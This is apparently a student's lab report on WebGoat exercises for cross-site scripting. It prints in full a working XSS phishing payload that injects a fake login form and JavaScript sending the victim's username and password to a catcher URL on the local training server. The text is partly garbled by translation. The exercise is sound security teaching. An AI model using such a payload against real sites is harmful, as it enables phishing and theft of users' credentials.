1. Pre-preparation of the practice process: WebGoat
Webgoat is divided into simple version and Development Board, simple version is a Java jar package, only need to have a Java environment, we execute the command line java -jar webgoat-container-7.0.1-war-exec.jar
run Webgoat:
Webgoat uses 8080 port, so enter the URL on the browser http://localhost:8080/WebGoat open the login screen
Because I use 7.1, so there is a default account, 8.0 of the here can apply for an account.
Practice content: Cross-site Scripting (XSS): 1. Phishing with XSS
His lesson is that a webpage might support phishing attacks if there is a known XSS attack on the page
The following is an example of a standard search feature.
With XSS and HTML insertion, your goal is to:
Inserting HTML into the request certificate
Add JavaScript to actually collect credentials
Publish the certificate to HTTP./Localhost:8080/webgoat/catcher? Property = yes ...
To pass this lesson, you must publish the voucher to the capture servlet.
To enter the XSS attack code in the search box, you can use XSS to further add elements to existing pages. We first create a form that allows the victim to fill in the user name and password in the form we created, add a piece of JavaScript code, read the username and password entered by the victim, and send the message to HTTP./Localhost:8080/webgoat/ Catcher Property = yes ..., the full XSS attack code is as follows:
</form><script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Your information was stolen by 5215! User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script><form name="phish"><br><br><HR> <H2>please input your information here:</H2><br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"><br> <input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
2.Stored XSS Attacks
This is an introduction to practicing yourself:
It is always a good practice to clean up all the inputs, especially those that will be used later as OS commands, scripts, and database query parameters. This is especially important for content that is permanently stored somewhere in the application. Users should not be able to create message content that could cause other users to load unwanted pages or unwanted content when retrieving user messages.
Storage-type XSS attack: XSS attack code is stored in the database, every time when the user opens this page will be executed, harmful, often words message board, every time when the user view message information is triggered. Causes an unexpected page or content to be loaded when the user accesses it.
2. Answer questions after the experiment
(1) SQL injection attack principle, how to defend
(2) The principle of XSS attack, how to defend
(3) CSRF attack principle, how to defend
3. Experiment Summary and experience
Network countermeasure technology 2017-2018-2 20155215 EXP9 Web Security Foundation